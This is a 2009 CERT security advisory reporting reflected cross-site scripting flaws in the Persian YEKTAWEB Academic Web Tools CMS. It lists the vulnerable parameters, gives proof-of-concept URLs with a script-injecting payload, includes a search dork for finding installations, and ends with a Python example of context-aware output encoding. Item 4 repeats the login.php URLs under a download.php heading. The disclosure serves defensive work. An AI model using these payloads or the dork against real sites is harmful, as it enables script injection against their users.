YEKTA WEB Academic Web Tools CMS Multiple XSS

2009-03-02 / 2009-03-03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

============================================
IUT-CERT
============================================
Title: Academic Web Tools CMS Multiple XSS
Vendor: www.yektaweb.com
Vulnerable Version: 1.5.7 and priors
Type: XSS
Fix: N/A
Dork: AWT YEKTA
============================================
nsec.ir
============================================

Description:
------------------
YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university affairs such as conferences, journals, etc. The built-in filter of this package cannot prevent XSS attacks on some parameters.

Vulnerabilities:
------------------
1- Cross Site Scripting (XSS) in "/page.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/page.php?sid=[XSS]
http://yoursite/page.php?logincase=[XSS]
http://yoursite/page.php?redirect=[XSS]

2- Cross Site Scripting (XSS) in "/page_arch.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/page_arch.php?sid=[XSS]
http://yoursite/page_arch.php?logincase=[XSS]
http://yoursite/page_arch.php?redirect=[XSS]

3- Cross Site Scripting (XSS) in "/login.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

4- Cross Site Scripting (XSS) in "/download.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

Exploit/PoC:
------------------
Example:
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>

Solution:
------------------
The input validation filter should be patched.
Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to: M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari
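The PoC string above is shaped to close a JS block comment (`*/`), an HTML comment (`-->`) and the enclosing `</script>` before opening its own script element, which is why a blocklist-style "input validation filter" is the wrong layer to fix this at. The added example below (not part of the advisory or the vendor's code; the vulnerable template shape is an assumption, since the CMS source is not published here) renders the advisory's payload through an assumed vulnerable template and through a context-aware encoder, and counts how many `<script>` elements Python's HTML tokenizer sees in each case.

```python
import html
import json
from html.parser import HTMLParser

# The PoC value from the advisory, copied here as the sample input.
POC = '1*/--></script><script>alert(188017)</script>'


def render_vulnerable(sid: str) -> str:
    """Assumed (hypothetical) shape of the vulnerable page: the raw parameter is
    spliced into an inline script inside an HTML comment and a JS block comment,
    which is exactly what the '*/-->' prefix of the PoC is built to close."""
    return '<script><!--\n/* sid=' + sid + ' */\n//--></script>'


def encode_for_js(value: str) -> str:
    """JSON-encode a value for an inline <script>, then escape <, > and & as
    \\uXXXX so the HTML tokenizer can never see </script>, <!-- or --> in it."""
    return (json.dumps(value)
            .replace('<', '\\u003c')
            .replace('>', '\\u003e')
            .replace('&', '\\u0026'))


def render_hardened(sid: str) -> str:
    """Same data, encoded per output context: entities in HTML text, JSON plus
    the extra escapes inside the script. No input blocklist is involved."""
    return ('<p>Page ' + html.escape(sid, quote=True) + '</p>\n'
            '<script>var sid = ' + encode_for_js(sid) + ';</script>')


def decodes_back(value: str) -> bool:
    """The escaping is lossless: the script still receives the original value."""
    return json.loads(encode_for_js(value)) == value


class ScriptCounter(HTMLParser):
    """Counts <script> start tags the tokenizer sees; the template adds one."""
    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.scripts += 1


def count_scripts(markup: str) -> int:
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts
```

`count_scripts(render_vulnerable(POC))` returns 2 (the attacker's script element is real), while `count_scripts(render_hardened(POC))` returns 1 and `decodes_back(POC)` is True.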

References:

http://seclists.org/bugtraq/2009/Mar/0005.html
